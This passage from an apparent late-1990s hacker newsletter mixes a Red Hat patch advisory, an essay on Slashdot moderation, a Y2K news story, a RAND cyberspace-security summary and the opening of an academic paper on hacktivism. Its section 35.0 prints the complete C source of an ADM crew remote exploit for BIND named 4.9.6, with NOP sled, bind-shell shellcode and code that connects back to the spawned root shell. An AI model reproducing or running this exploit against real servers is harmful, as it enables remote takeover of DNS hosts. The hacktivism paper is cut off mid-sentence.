ftp://updates.redhat.com/4.2/i386/sysklogd-1.3.31-0.0.i386.rpm sparc: rpm -Uvh ftp://updates.redhat.com/4.2/sparc/sysklogd-1.3.31-0.0.sparc.r pm source: rpm -Uvh ftp://updates.redhat.com/4.2/SRPMS/sysklogd-1.3.31-0.0.src.rpm zgv - - --- Local users could gain root access. Red Hat Linux 5.2: - - ------------------ i386: rpm -Uvh ftp://updates.redhat.com/5.2/i386/zgv-3.0-7.i386.rpm source: rpm -Uvh ftp://updates.redhat.com/5.2/SRPMS/zgv-3.0-7.src.rpm Red Hat Linux 5.1: - - ------------------ i386: rpm -Uvh ftp://updates.redhat.com/5.1/i386/zgv-3.0-5.1.i386.rpm source: rpm -Uvh ftp://updates.redhat.com/5.1/SRPMS/zgv-3.0-5.1.src.rpm Red Hat Linux 5.0: - - ------------------ i386: rpm -Uvh ftp://updates.redhat.com/5.0/i386/zgv-3.0-1.5.0.i386.rpm source: rpm -Uvh ftp://updates.redhat.com/5.0/SRPMS/zgv-3.0-1.5.0.src.rpm Red Hat Linux 4.2: - - ------------------ i386: rpm -Uvh ftp://updates.redhat.com/4.2/i386/zgv-3.0-1.4.2.i386.rpm source: rpm -Uvh ftp://updates.redhat.com/4.2/SRPMS/zgv-3.0-1.4.2.src.rpm Cristian - - -- - - ---------------------------------------------------------------------- Cristian Gafton -- gafton@redhat.com -- Red Hat Software, Inc. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ UNIX is user friendly. It's just selective about who its friends are. @HWA 33.0 The Suburbanization of Slashdot an internet institution by Pasty Drone.. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The Suburbanization of Slashdot by Pasty Drone email
So I surfed into Slashdot last week, expecting the usual motley group of posters, flamers and idiots that I have come to love watching interact in the great theater that is Threads. But as I looked around, I became aware that gone were the weeds of the Meepts!, the empty, unpainted houses of the Firsts!, and the nefarious crackdens of the flamers...all around me was a chilling non-organic robot-like civility coming from posts that said things like "I like Jon" and "Slashdot is great". The posts were smooth and straight and as boring as a well-kept lawn. The unpleasant, the idiotic, the taboo had vanished from my screen. Slashdot had moved to the suburbs. And why should I, the CEO of NewsTrolls care what happens on Slashdot? It's Rob's site he can do with it what he wants. And yet...and yet... I suppose to understand my feelings about Slashdot I have to explain NewsTrolls' relationship with them. When we started NewsTrolls in September of 1998, we were already well-established as daily readers of Slashdot. Even before our beginning as our own site, I would regularly link to Slashdot articles in the daily trolling I did in HotWired's old Media Rant Threads. When NewsTrolls, after collective debate via posts, decided to have advertising on the site, we at first only ran with Slashdot's banner as a tribute to their work. At that time Slashdot was also running our NewsTrolls banner. Another similarity we share is that when NewsTrolls started out Jon Katz contributed articles to us , but after a while he moved over to publish on Slashdot I can't really fault him for moving...as a writer whose persona is dependent on the number of Netizens who read and like him, it made business sense to go where the numbers were bigger. And Slashdot is definitely a much larger site than NewsTrolls. Running a site dedicated to free speech with a Threads board that can be vociferous on a good day and downright cruel on a bad one (myself included) is a giant pain in the ass. I understand exactly (albeit on a smaller scale) what Rob's frustrations are. How do you keep the quality up and the spam down? In Slashdot's case, Rob has decided to appoint moderators to rank posts and then let users customize their viewing options so to allow them to choose which posts to view. Sounds reasonable, but there are two major problems. 1. The default is set at 0 for new users or users not logged in. Therefore, no posts that have been ranked below 0 are seen. While the option is there for the readers to change to view all posts, anyone who has been on the Internet more than 5 years knows we are constantly dealing with newbies who are lucky to navigate a page, let alone feel secure enough to change options. New users who are not computer-savvy stick with defaults. 2. The moderators who number over 400 were chosen by a smaller group of under 30 who found their posts to be useful and informative. These 400+ now rank the rest of the posts. The hope is that the moderators will spend more time grading up and only grading down the non-useful posts. Unfortunately, posters who express dissenting opinions in non-traditional manners are being downgraded, too. When the moderation article first came out, I started a thread to discuss the ramifications of moderating threads. Regulars of NewsTrolls and readers from /. have been debating the issue with many excellent points. Now here's my half-rant/half-loveletter on Slashdot... To me, what I have love about Slashdot is that has epitomized the bizarre bazaar of open source. Scriptkiddies, geeks, phreaks, hackers, crackers, wannabes, sysadmins, developers, suits, all hollering at the story presented, at each other, at the world in general sometimes. Maybe what others call noise, I call music. I loved to see how a post on KDE could elicit useful links, suggestions, inside scoops, clueless questions, and loud dissenters from the GNOME crowd. Or how posters would take sides on Perens or Raymond with the bloodthirst of gamblers at a cockfight. Or the hushed awe, meaningful whispers, and conspiracy theories that flew whenever Transmeta was mentioned. Or the joyful solidarity as a new Linux kernel was posted. To me, the organic twists and turns a thread would take was just as enlightening as the articles to which they were attached. The grammar flames were like a call-and-response between posters who had obviously gone through the same motions before. The glorious meept! nonsense posts was like throwing in moments straight out of Theater of the Absurd. The First Posts! were crows of delight that said: "I'm here!, You can see me!". The whole cacophonous din was like walking down Times Square in rush hour when Hansen is in the 2nd Floor MTV studios. It was ALIVE! It had SOUL! Moderation changes all of that. It cleans up Times Square faster than Disney with a fistful of Giuliani tax incentives. It moves Slashdot to the suburbs. Now posts are judged worthy or not-worthy. Instead of simply ignoring idiots, they are now branded with a negative sign. And worst of all, dissenting opinions, some with good points, are being downgraded as well. If you experiment with the moderation on 2 or 3, you get all these earnest well-written posts that remind me of church ladies' conversation at a quilting bee. Ugh! And if you view the posts by ranked order, the organic flow is cut to bits... no longer can you see how one point flows into another and how you got from A to Z. Is this progress? Is this what web discussion is about? No matter how much advetisers wish it so, you cannot pin down a posting community. You can't expect them to all know English in the first place and you certainly can't expect them to be of the same mind when they are of every age and experience level in the book. Why then try to moderate them? Why are so many people congratulating Slashdot on cutting down on "the noise"? Why is it judged "noise" at all? I don't see it as noise...I may skim it instead of reading it, but I can't tell you how many times a well-placed, off-topic post has made my day. I don't want to read only the standard opinion on any topic and IMO that is the big pitfall with moderation. I want ALL the sights and smells of the bazaar, Times Square, the big city...from garbage to haute cuisine...not merely the blandness of a made-to-order, frozen-dinner, must-see-TV suburb. Why? Because in my case, it is the posters who have nailed my mistakes, cursed me a blue streak, and even made me cry from whom I have learned the most. They have forced me to re-evaluate my opinions and restate my thoughts. They have taught me and by their hard words helped me to grow. And, they have become friends. So what should Slashdot do instead? A few ideas: 1. Set the default to all-posts-viewed. If I'm not logged in or am new, let me see Slashdot in all its raging glory and then let me decide if I want to choose moderation. 2. I can't prove this might help with the "noise", but I think having a Threads area as opposed to posts being on the same page as the article might naturally eliminate some problems. That way, people who really felt inspired to say something would click on a link at the end of the article to a thread discussing the issue at hand. There wouldn't be the vanity of being "seen" so much, which leads to First Posts! and the like. 3. If you must moderate, have a time limit on moderation, random selection of moderators, and a constant turnover on who is moderating among your registered users. This will eliminate some of the cronyism that has already occured due to the 400+ being selected by the original group. 4. Learn to love the flames. Certainly don't worry about Katz flames-- we gave him total hell on HotWired. It's a tradition. Flames are instructional, even if you don't like what they're teaching you. 5. Many posters seem to flame when there are articles that they don't feel are hard-core Slashdot. So how about a separate page for those articles? The front page would be all the "News for Nerds" and you could have a link to something like "The Rest of the World" which would be the same setup but with different articles (and a place for Katz). When it's all said and done, if Rob wants to morph Slashdot threads into a university-like moderated discussion, it's his call. Either way, I'll still be reading Slashdot. But to me, what makes Slashdot great is its many passionate voices, not a few well-written posts. Who needs the surburbs?...Give me that funk! @HWA 34.0 Canada rolls into the fiscal new millennium with a steady eye on its govt mainframes.... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Canada Rolls into Fiscal 2000 by Matt Friedman 9:30 a.m. 1.Apr.99.PST MONTREAL -- Civil servants here were watching their computer monitors closely Thursday. Canada's federal government began its fiscal year today, marking the first time such a year will include dates in the year 2000. If Ottawa is going to be bitten by the millennium bug, this is when the problems might start showing up. The government says it's ready. "April 1 is hardly a surprise for us," said Paul Walsh, a spokesman for the federal Department of Public Works and Government Services. "We have been doing compliance testing for the beginning of the fiscal year and for all of the other key days leading up to and after January 1, 2000." Those trouble dates include New Year's Day itself, the start of the new fiscal year, and 9 September 1999 (the ninth day of the ninth month of 1999). Ottawa has also tested for 7 April 1999 -- the 99th day of 1999 -- and for 29 February and 1 March 2000. The first year of the 21st century is a leap year, while the first year of the 20th century was not. In any case, Canada will survive. If Y2K problems do arise, they will surface in financial reporting and management systems. Department and program managers may not have correct budget information, or may not be able to allocate funds. Walsh says that won't happen. "We have tested all government-wide, mission-critical systems," Walsh said. "We ran the systems on mainframes, simulating different dates. And we tested all of the key dates, so we know that 1 April or any other date isn't an issue. Any problems would already have shown up in testing." Joe Boivin, president of the Ottawa-based Global Millennium Foundation, has been critical of the Canadian government's Y2K efforts. However, he says that, for the most part, Ottawa has its house in order. "The truth is, that anyone can see if there's going to be a problem by advancing dates in a spreadsheet," Boivin said. "It's not a difficult testing issue, and Ottawa has been testing." "The truth is that the government is one of the world leaders on this." The federal body that has been auditing the compliance process agrees. Though it is cautiously optimistic, the Office of the Auditor General (OAG) warns that there could still be problems. "No one would claim that everything is all right at this point," said Nancy Cheng, a principal with the OAG's Audit Operations Branch. "The government is hoping to have everything done by June. It has taken the issue seriously, and there has been tremendous progress, but there will be glitches. It's just not clear whether they'll be visible to the public." However, for all the planning and testing, Boivin remains skeptical that the Canadian government has covered all the bases. Some things are just going to fall through the cracks, he said. "The government report has high completion numbers, but they still haven't implemented compliance in a production environment," Boivin said. "You may have 90 percent of the job done, but it's the last 10 percent, when you get into the real-time world versus hopeful thinking and careful planning, that will give you problems. Anyone who has ever worked in a production environment can tell you that." The biggest problems could stem from what Cheng called "interface issues," when government departments interact with business partners or with the provincial governments, many which are far behind Ottawa in their compliance efforts. "The government has a lot of partners in the public and private sectors, and a lot of them are at different stages of compliance," she said. "That makes it difficult to know for sure, how prepared we really are." "If Canada has an Achilles' heel, it's that we have a lot of people doing things at various levels of government and in the private sector, but we don't have a national Y2K coordinator," Boivin says. "Even if Ottawa is in good shape, there are the provinces -- and the municipalities aren't even at the 50 percent mark in compliance implementation and testing." The Treasury Board of Canada's monthly Y2K progress report will be available on the board's Web site. The auditor general plans a third audit of federal Y2K readiness in June. This time, however, Cheng says that her department will have a special focus on federal contingency plans. @HWA 35.0 More exploits from the ADM crew ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* * THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE FROM THE ADM CREW * * named_v3.c improved linux x86 named 4.9.6-REL exploit * by plaguez aka ndubee. * thanks to napster, and prym for the shellcode * */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define NOP 0x90 #define WAITPORT 10752 char buff[10000]; char c0de[] = "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x4c\xeb\x4c\x5e\xb0\x02\x89" "\x06\xfe\xc8\x89\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\x31\xdb\xfe" "\xc3\x89\xf1\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x2a\x66" "\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10" "\x89\x46\x08\xb0\x66\xfe\xc3\xcd\x80\xb0\x01\x89\x46\x04\xb0\x66" "\xb3\x04\xcd\x80\xeb\x04\xeb\x4a\xeb\x50\x31\xc0\x89\x46\x04\x89" "\x46\x08\xb0\x66\xfe\xc3\xcd\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80" "\xb0\x3f\xfe\xc1\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xb8\x2f\x62\x69" "\x6e\x89\x06\xb8\x2f\x73\x68\x21\x89\x46\x04\x31\xc0\x88\x46\x07" "\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" "\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5d\xff\xff\xff"; char shellcode[500]; void handle_alarm(sn) int sn; { alarm(0); signal(SIGALRM, SIG_DFL); printf("Unable to connect: Connection timed out\n"); exit(0); } void addchar(char *str, char ch) { unsigned int len; len = strlen(str); str[len] = ch; str[len + 1] = 0; } int ConnectServer(char *host, int port) { int sockdesc; struct sockaddr_in sin; struct hostent *he; sin.sin_port = htons(port); sin.sin_family = AF_INET; he = gethostbyname(host); if (he) { memcpy((caddr_t) & sin.sin_addr.s_addr, he->h_addr, he->h_length); } else { printf("Error: gethostbyname(): Unable to resolve [%s]\n", host); exit(-1); } if ((sockdesc = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("Error: socket()"); exit(-1); } if (connect(sockdesc, (struct sockaddr *) &sin, sizeof(sin)) < 0) { perror("Error: connect()"); exit(-1); } return sockdesc; } void MultiplexConnection(int sockdesc) { int ret; char sockbuf[2048]; fd_set readfds; while (1) { FD_ZERO(&readfds); FD_SET(0, &readfds); FD_SET(sockdesc, &readfds); select(255, &readfds, NULL, NULL, NULL); if (FD_ISSET(sockdesc, &readfds)) { memset(sockbuf, 0, 2048); ret = read(sockdesc, sockbuf, 2048); if (ret <= 0) { printf("Connection closed by foreign host.\n"); exit(-1); } printf("%s", sockbuf); } if (FD_ISSET(0, &readfds)) { memset(sockbuf, 0, 2048); read(0, sockbuf, 2048); write(sockdesc, sockbuf, 2048); } } } int lookup_host(ra, hn, rp) struct sockaddr_in *ra; char *hn; unsigned short rp; { ra->sin_family = AF_INET; ra->sin_port = htons(rp); if ((ra->sin_addr.s_addr = inet_addr(hn)) == -1) { struct hostent *he; if ((he = gethostbyname(hn)) != (struct hostent *) NULL) { memcpy(&ra->sin_addr.s_addr, he->h_addr, 4); return 1; } else herror("Unable to resolve hostname"); } else return 1; return 0; } void attack_bind(ra, loc) struct sockaddr_in ra; char *loc; { int sd, pktlen, sockdesc; char keypkt[6000], rname[6000]; struct hostent *he; if ((sd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("cannot open tcp socket"); return; } printf("Connecting to nameserver via TCP.."); fflush(stdout); signal(SIGALRM, handle_alarm); alarm(15); if (connect(sd, (struct sockaddr *) &ra, sizeof(ra)) == -1) { perror("Unable to connect"); close(sd); return; } printf(".done.\n"); alarm(0); if ((he = gethostbyaddr((char *) &ra.sin_addr, sizeof(ra.sin_addr), AF_INET)) == (struct hostent *) NULL) sprintf(rname, "%s", inet_ntoa(ra.sin_addr)); else strncpy(rname, he->h_name, sizeof(rname)); pktlen = make_keypkt(keypkt); send_packet(sd, keypkt, pktlen); close(sd); printf("Attente connexion...\n"); fflush(stdout); sleep(5); sockdesc = ConnectServer(loc, WAITPORT); printf("Shell found! Free to execute commands suffixed with a ';'\n"); MultiplexConnection(sockdesc); close(sockdesc); exit(-1); } int make_keypkt(pktbuf) char *pktbuf; { HEADER *dnsh; char *ptr = pktbuf; int pktlen = 0; unsigned long ttl = 31337; memset(pktbuf, 0, sizeof(pktbuf)); /* fill the dns header */ dnsh = (HEADER *) ptr; dnsh->id = htons(rand() % 65535); dnsh->qr = 0; dnsh->opcode = IQUERY; dnsh->aa = 0; dnsh->tc = 0; dnsh->rd = 1; dnsh->ra = 1; dnsh->unused = 0; /* removed for portability (it's zero already) dnsh->pr = 0; */ dnsh->rcode = 0; dnsh->qdcount = htons(0); dnsh->ancount = htons(1); dnsh->nscount = htons(0); dnsh->arcount = htons(0); pktlen += sizeof(HEADER); ptr += sizeof(HEADER); /* this is the domain name (nothing here) */ *(ptr++) = '\0'; pktlen++; /* fill out the rest of the rr */ PUTSHORT(T_A, ptr); PUTSHORT(C_IN, ptr); PUTLONG(ttl, ptr); PUTSHORT((strlen(buff) + 1), ptr); memcpy(ptr + 1, buff, strlen(buff) + 1); ptr = ptr + (strlen(buff) + 1); pktlen += ((sizeof(short) * 3) + sizeof(long) + (strlen(buff) + 1)); return pktlen; } int send_packet(sd, pktbuf, pktlen) int sd, pktlen; char *pktbuf; { char tmp[2], *tmpptr; tmpptr = tmp; PUTSHORT(pktlen, tmpptr); if (write(sd, tmp, 2) != 2 || write(sd, pktbuf, pktlen) != pktlen) { perror("write failed"); return 0; } return 1; } void usage(char *pname) { printf("\nUsage:\t%s targethost [offset]\n", pname); printf("\ttargethost may either be name or ip.\n\n"); } void main(argc, argv) int argc; char *argv[]; { int i; struct sockaddr_in ra; char *ptr; char *endbuff; unsigned long addr; unsigned char jmp; int offset = 2750; /* 2200 --> 3500 */ int bsize = 1536; if (argc < 2) { usage(argv[0]); exit(1); } if (argc == 3) offset += atoi(argv[2]); strcpy(shellcode, c0de); addr = 0xbffffff0 - offset; printf("longueur shellcode : %i\n", strlen(c0de)); printf("taille buffer %i\n", bsize); printf("offset %i\n", offset); printf("adresse: 0x%lx\n", addr); endbuff = buff + bsize; for (ptr = buff; ptr < (endbuff - strlen(shellcode) - 8); ptr++) *ptr = NOP; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; *((long *) ptr) = addr - 16; *((long *) (ptr + 4)) = addr; *(ptr + 9) = 0; if (!lookup_host(&ra, argv[1], NAMESERVER_PORT)) return; srand(time(NULL)); attack_bind(ra, argv[1]); } =------------------------------------------------------------------------------------------------= @HWA ********************************************************************************************************************* * =--------------------------------------------------------------------= * * * * Special Section: Online civil disobedience and hacktivism * * * * =--------------------------------------------------------------------= * ********************************************************************************************************************* SP.00 Intro article ~~~~~~~~~~~~~ That Wild, Wild Cyberspace Frontier Cyberspace, like the old West, is a lawless domain of limitless possibilities--for good but also for evil. As in a frontier town, everyone with links to the Internet is going to have to see to their own protection, at least until law and order catch up. A Russian hacker in St. Petersburg breaks into a Citibank computer system in New York and steals more than $10 million by electronically transferring the money to other banks around the world. Improbable? Not at all--the only remarkable aspect of the affair is that the hacker was caught and the case became public when Citibank requested his extradition. Banks try to keep such thefts under wraps because of the bad publicity, but security experts estimate that about 36 instances of computer intruders stealing sums of more than $1 million occur each year in Europe and the United States. And that is just the tip of an iceberg of real and potential, civil and military, deliberate and accidental threats to the global web of interlinked computers and communications systems. In the headlong rush to "connect," little attention is being paid to gaping holes in the security of these information networks, according to RAND researchers Richard O. Hundley and Robert H. Anderson. "This is everybody's problem, and therefore nobody's problem; it falls through all the cracks," they write in Security in Cyberspace: An Emerging Challenge for Society. The authors provide a tour of the cyberspace frontier and of the "bad guys" and dangers lurking there. They also sketch a plan to bring a modicum of order and security to this chaotic, rapidly expanding, and essentially lawless territory. From Printed Page to Cyberspace More and more informational activities are going digital and electronic, they point out, with these versions often supplanting all paper records. This is true of educational activities, the holdings of libraries, the process and results of research, engineering designs and industrial processes, the various mass information and entertainment media (newspapers, television, movies, etc.), and all manner of private and public records. Also moving from the printed page into cyberspace are transactional activities, involving myriad commercial business and financial transactions, the operations of governments at all levels, political activities, and both public and private social interactions. Activities involving the operation and control of essential physical and functional infrastructures--power grids, air traffic control systems, telecommunications and the like--are increasingly shifting from mechanical/electrical control to electronic/software control. And the connectivity between information systems that is at the heart of cyberspace is spreading worldwide and becoming more and more universal, with millions of new entry points every year. These loosely protected information networks can be attacked in a variety of ways, for a variety of purposes, the authors note: to insert false data, to steal, change or destroy data and programs, and to disrupt, manipulate or control a system's performance. Many of these types of attack have already occurred. Two notable examples are the "Internet Worm," which disrupted activities on the Internet in 1988, and the "Hannover Hacker," who stole information from computer files all over the world during 1986-1988 and sold it to the KGB. All of these hostile actions can be done surreptitiously and many can be done remotely, at a great distance from the target, via a series of interlinked computers. Malevolent acts are not the only worry; information systems operating in cyberspace can also be brought down unintentionally. Instances of this range from a farmer accidentally cutting a fiber-optic cable while burying a dead cow (which closed four major air-traffic control centers for over five hours in May 1991) to the software error that caused a major breakdown in AT&T long distance service in 1992. Who Are the Potential Villains? The explosive expansion of cyberspace activities gives rise to a new set of vulnerabilities--for governments, the military, businesses, individuals and society as a whole--that can be exploited by a wide spectrum of "bad guys" for a variety of motives, Hundley and Anderson contend. These include hackers, disgruntled employees, criminals, terrorists, commercial organizations, and nations. The case of hacker Kevin Mitnick provides some insight into the first type. He led authorities on a high-speed chase through cyberspace after lifting 20,000 credit card numbers from various computer systems. Mitnick did not try to cash in on the ill-gotten bonanza, apparently more interested in thrills than profits, and was caught only after deliberately provoking the attention of a top computer security expert. Mitnick hacked into the files of Tsutomu Shimomura, who then tracked him down for authorities. The resources required to cause harm in this cyberspace world are relatively small: one (or at most a few) computer experts with computer terminals hooked into the worldwide network can do considerable damage. The resources required for a nation or group to do significant damage to the military, economy, or society of another nation are larger, but far fewer than those required to acquire and use major weapon systems. The preparations can also be well hidden, if done carefully. As more and more people become "computer smart" and as villains of many different stripes become more and more aware of the opportunities for mayhem in cyberspace, the resources for major attacks could be within the reach of many nations and some malevolent groups. To further complicate matters, cyberspace attacks mounted by these different actors are indistinguishable from each other, as are attacks mounted by domestic and foreign-based perpetrators, insofar as the perceptions of the victims are concerned. The distinction between "crime" and "warfare," "accident" and "attack," becomes blurred as does the distinction between police and military responsibilities. In the authors' view, the danger of more (and more serious) threats in cyberspace is multiplying alarmingly. Statistics support their concern. The number of reported (many incidents go unreported) Internet penetrations rose from six in 1988 to 1,172 in the first six months of 1994. So far, at least, no major disasters have occurred, but the potential certainly exists. For example, it might be possible in the future for some perpetrators (nations or major terrorist groups) to inflict substantial damage by bringing down key parts of the nation's air traffic control system, or the electric power grid, or the international monetary transfer system, even if for a limited time. Nor is a military disaster out of the question. If an enemy cyberspace attack disrupted a vital military logistics system, or the telecommunications network on which it depends, for a critical period during a campaign, the campaign could be jeopardized. But taming this wild frontier won't be easy. In addition to the chaotic growth of cyberspace and the blurring of lines of local, national and international authority over activities conducted there, the authors identify another problem. Many individual users neither understand nor accept the need for communal responsibility in safeguarding cyberspace. In suggesting the elements of a strategy for cyberspace security, Hundley and Anderson draw on a familiar metaphor. Like frontier towns, let each local enclave (business, university, research organization, government agency) see to its own protection, at least for the present, relying on available computer security software and firewalls (security strategies that control electronic access by outsiders but allow insiders, who presumably are trustworthy, to travel the information highways and byways with comparative freedom). But these are little more than stopgap measures, the authors conclude. Barring a technological breakthrough that is not now on the horizon, effective control of cyberspace will require a combination of laws, regulations, the education and training of users, and the cooperation of countries worldwide. Security in Cyberspace: An Emerging Challenge for Society, by Richard O. Hundley and Robert H. Anderson, 1994. SP.01 Article 1:"Electronic Civil Disobedience and the World Wide Web of Hacktivism: " ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Electronic Civil Disobedience and the World Wide Web of Hacktivism: A Mapping of Extraparliamentarian Direct Action Net Politics _____________________ Stefan Wray Source:http://www.freespeech.org/resistance/texts/hacktivism.html Introduction In the next century, when cyber-historians look back to the 1990s, they will recognize 1995 as the year of the graphical browser, the year the Internet began to be overshadowed by the Web. But they will probably also view 1998 as an important moment -- in the history of the browser wars. At a minimum, 1998 will be noted for the emergence of two terms that represent similar phenomena: electronic civil disobedience and hacktivism. In that year, a Net based affinity group called the Electronic Disturbance Theater pushed and agitated for new experimentation with electronic civil disobedience actions aimed mostly at the Mexican government. It engaged its FloodNet software and invited participation to an international set of artists, digerati, and political activists to make a "symbolic gesture" in support of Mexico's Zapatistas. While at the same time, in Britain, in Australia, in India, in China, on almost every continent there were reports of hacktivity. In the spring of 1998, a young British hacker known as "JF" accessed about 300 web sites and placed anti-nuclear text and imagery. He entered, changed and added HTML code. At that point it was the biggest political hack of its kind. Since then, and increasingly over the course of the year, there were numerous reports of web sites being accessed and altered with political content. Taken together we may consider both the more symbolic electronic civil disobedience actions and the more tangible hacktivist events under the rubric of extraparliamentarian direct action Net politics, where extraparliamentarian is taken to mean politics other than electoral or party politics, primarily the grassroots politics of social movement. By no means was 1998 the first year of the browser wars, but it was the year when electronic civil disobedience and hacktivism came to the fore, evidenced by a front page New York Times article on the subject by the end of October. Since then the subject has continued to move through the media sphere. 1 What this paper attempts to do is examine these emerging trends from a slightly wider angled lens. This paper puts forth five portals for consideration: computerized activism, grassroots infowar, electronic civil disobedience, politicized hacking, and resistance to future war. At first they were conceived as five portals into Hacktivism, but perhaps they better serve as five portals for looking at the wider world of extraparliamentarian direct action Net politics, although that phrase is admittedly awkward. Nevertheless, these five portals seem to provide a useful starting point for a more in-depth, yet to come, examination of the convergence of activism, art, and computer-based communication and media. In addition to starting to define, to frame, and to contextualize contemporary hacktivity, in terms of its roots, its lateral dimension, and its trajectivity, this paper also asks some nascent questions of a political, tactical, technological, ethical, and legal nature and makes some preliminary claims about the likely direction of these various movements. Computerized Activism Computerized activism exists at the intersections of politico-social movements and computer-mediated communication. The origins of computerized activism extend back in pre-Web history to the mid 1980s. As an example, the first version of PeaceNet appeared in early 1986. PeaceNet enabled - really for the first time - political activists to communicate with one another across international borders with relative ease and speed. 2 The advent of newsgroup services like PeaceNet, and wider dispersal of other Bulletin Board Systems, email lists, and gopher sites characterizes the cyber-environment within which most early on-line political activists found themselves. This largely text-based environment persisted up until as late as 1994 and 1995, when the first GUI browsers were introduced. Even today, while Web sites augment these earlier forms, email communication remains a central device in the international circulation of struggle and the creation and maintenance of international solidarity networks.3 During the early to mid 1980s the subject of computer-mediated communication (CMC) was taken up by scholars in, for example, psychology and sociology. When communication scholars began to examine CMC, and in particular when they began to assess the juncture of political communication and CMC, a number of academic treatments of "electronic democracy" were written in which politics is positioned narrowly within the confines of electoral or parliamentarian politics. 4 Among the earliest treatments of CMC from among communication scholars who entertain extraparliamentarian or grassroots politics is by Downing in "Computers for Political Change." 5 Not surprisingly, PeaceNet is one of his case studies. For purposes of tracing the origins of more current cross-border email exchange and its role in creating and maintaining international solidarity networks, Downing points to PeaceNet's establishment of international links in 1987. Among early adopters of these means of communication were people in the 1980s anti-nuclear and Central American solidarity movements. By the late 1980s and the very beginning of the 1990s, the significance of cross-border, international, email communication began to be realized. The international role of email communication, coupled to varying degrees with the use of the Fax machine, was highlighted in both the struggles of pro-democracy Chinese students and in broader trans-national movements that lead to the dissolution of the Soviet Union. Shortly thereafter, we began to see scholarly work on this subject. Harasim’s "Global Networks: Computers and International Communication" began to theorize about the role of international email communication in linking together the world. 6 Computerized activism remained marginal to political and social movements until the explosion of the Internet in the early to mid 1990s and more so until the arrival of the graphical browser in 1994 and 1995. Now, in the post-Web Internet phase there is widespread use of these media forms by a plethora of grassroots groups and other political actors in countries all over the world. 7 A common thread or understanding that runs through various types of politically based computer-mediated communication, from early BBS systems, to email listservs, and to sophisticated Web sites with fancy bells and whistles, seems to be an overarching dominant paradigm that privileges discourse, dialogue, discussion and open and free access. This observation becomes important when looking more at electronic civil disobedience and politicized hacking, because it is with this dominant paradigm of the Habermasian Web that these later forms conflict and cause friction. So the first portal of Computerized Activism is important for understanding the roots of today’s extraparliamentarian, more direct action focused, political CMC. It is the portal that has been with us the longest, and the portal within which most political actors on the Net feel the most comfortable. Computerized activism, defined more purely as the use of the Internet infrastructure as a means for activists to communicate with one another, across international borders or not, is less threatening to power than the other types of uses we see emerging in which the Internet infrastructure is not only a means toward or a site for communication, but the Internet infrastructure itself becomes an object or site for action. This transgression, or paradigmatic shift in thinking, of moving away from believing the Internet solely as communication device to Internet as communication device and site for action is dealt with incrementally in the next four sections. Grassroots Infowar Grassroots infowar is an intensification of computerized activism. Infowar here refers to a war of words, a propaganda war. Grassroots infowar is the first step, the first move away from the Internet as just a site for communication and the beginning of the transformation from word to deed. Grassroots infowar actors emerge fully cognizant they are on a global stage, telepresent across borders, in many locations simultaneously. There exists a sense of immediacy and interconnectivity at a global level. More than a mere sharing of information and dialogue, there is a desire to push words towards action. Internet media forms become vehicles for inciting action as opposed to simply describing or reporting. In the early 1990s, following the U.S. directed "smart" bombardment of Iraq and following the dissolution of the Soviet Union and the subsequent uselessness of Cold War rhetoric as a rationalization for foreign intervention, the U.S. military-intelligence community, along with its allies in financial-corporate sectors, needed to craft a new military doctrine. Their answer was Information Warfare and the threat of info-terrorism. State-side scholars at RAND, a think tank in Santa Monica, California, that often does the military's "thinking", set about devising new theoretical constructs that would lay the basis for their version of Information Warfare. In 1993, under the RAND banner, Ronfeldt and Arquilla wrote Cyberwar is Coming! This work sets out the distinctions between netwar and cyberwar and is cited by nearly every subsequent treatment of Information Warfare theory.8 Where netwar refers more to the war of words, the propaganda war that exists on the Internet itself, cyberwar refers to cybernetic warfare, war dependent on computers and communications systems, the war of C4I - Command, Control, Communication, Computers, and Information. Not long after RAND's theoretical intervention, pragmatic cases of netwar appeared. Among the most celebrated is the case of Mexico's Zapatistas and the international community of supporters that quickly brought that struggle on to the Internet. With the global pro-Zapatista Internet experience there began to be a rethinking or an interrogation of RAND's theoretical constructs, albeit from a more radical grassroots perspective. Some of this recasting has been brought forth in pieces by Harry Cleaver, a professor at the University of Texas at Austin and key person behind the Chiapas95 project, an email-based news and information distribution service. Probably Cleaver's most well known work in this regard is "The Zapatistas and the Electronic Fabric of Struggle." 9 Despite some radical interventions and attempts to reframe dominant forms of military and intelligence Information Warfare theory, most of the material, not surprisingly, is produced by the likes of RAND, the National Defense University, the Department of Defense, the US Air Force, or private sector initiatives. The meme of Information Warfare seems to have spread and been promulgated largely through network security paranoics and others keen on guarding digital property. But there are signs that Information Warfare is spreading to other areas. This year Information Wafare hit the international digital arts community by being the main subject of the annual Ars Electronic Festival in Linz, Austria.9 Theorizing about grassroots or bottom-up Information Warfare doesn't nearly get as much attention as the dominant models and as a consequence there is not much written on the subject. 11 The case of the global pro-Zapatista networks of solidarity and resistance offers a point of departure for further examination of grassroots infowar. One feature of Zapatista experience over the course of the last 5 years is that it has been a war of words, as opposed to a prolonged military conflict. This is not to say there isn't a strong Mexican military presence in the state of Chiapas. Quite the contrary is true. But fighting technically ended on January 12, 1994 and since then there has been a ceasefire and numerous attempts at negotiation.12 What scholars, activists, and journalists, on both the 